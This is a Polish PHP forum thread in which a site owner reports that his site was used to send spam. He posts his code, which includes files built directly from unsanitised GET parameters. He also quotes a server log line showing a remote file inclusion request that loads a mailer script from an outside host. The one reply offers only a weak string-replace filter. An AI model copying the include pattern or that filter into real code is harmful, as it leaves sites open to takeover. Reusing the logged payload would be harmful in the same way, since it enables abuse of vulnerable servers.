Zostałem zaatakowany. Hacked & SPAM Opcje

[admin22]

Witam.
Miałem nie dawno przykre doświadczenie z wykorzystaniem mojego skryptu do rozsyłania spamu.

Struktura moich adresów www była nateępująca: http://domena.pl/?dzial=katalog& str=nazwa_pliku

[PHP] pobierz, plaintext 
<?php
if ($dzial=="" && $str=="")
				  {
				   include "serwis/pierwsza.php";
				   }
				   else
				   {
				   $adres="$dzial"."/"."$str.php";
					include "$adres";
					}
?>
[PHP] pobierz, plaintext 

Niestety skrypt został wykorzystany przeciwko mnie:

196.207.13.162 - - [14/Dec/2006:15:23:38 +0100] "POST
/?dzial=http://www.geocities.com/kelvinbabamasterofmailer//hacked_master_of_mailer.txt?
HTTP/1.1" 200 20865
"http://domena.pl/?dzial=http://www.geocities.com/kelvinbabamasterofmailer//hacked_master_of_mailer.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

W konsekwencji zmienna dział pozwala na wykorzystywanie obcych skryptów.

W jaki sposób mam przekształcić prosty skrypt, aby nie umożliwiał zmiennej dział i str na tego typu działania.
Bardzo proszę o pomoc z uwagi na to że mój serwis został zablokowany.

[nospor]

[PHP] pobierz, plaintext 
<?php
$page = ereg_replace("://","#",$_GET['dzial']);
?>
[PHP] pobierz, plaintext 

no ale co to ma byc? nie wiesz, ze jesli dasz \" - to takie cos oznacza ze wstawiasz ". I taki zapis powoduje ze masz niepodomykane ". skladniowo poprawnie powinno byc tak:

[PHP] pobierz, plaintext 
<?php
$page = ereg_replace("://","#",$_GET['dzial']);
?>
[PHP] pobierz, plaintext 

ale czy to bedzie to samo wyrazenie co chciales to juz nie wiem

F1, F1, F1..

Daruj sobie. napisz po ludzku "Pomoc". to nie tak ciezko

proszę poprawić tytuł o znacznik zgodnie z zasadami forum Przedszkole:
Temat: Tematyka i zasady panujace na forum Przedszkole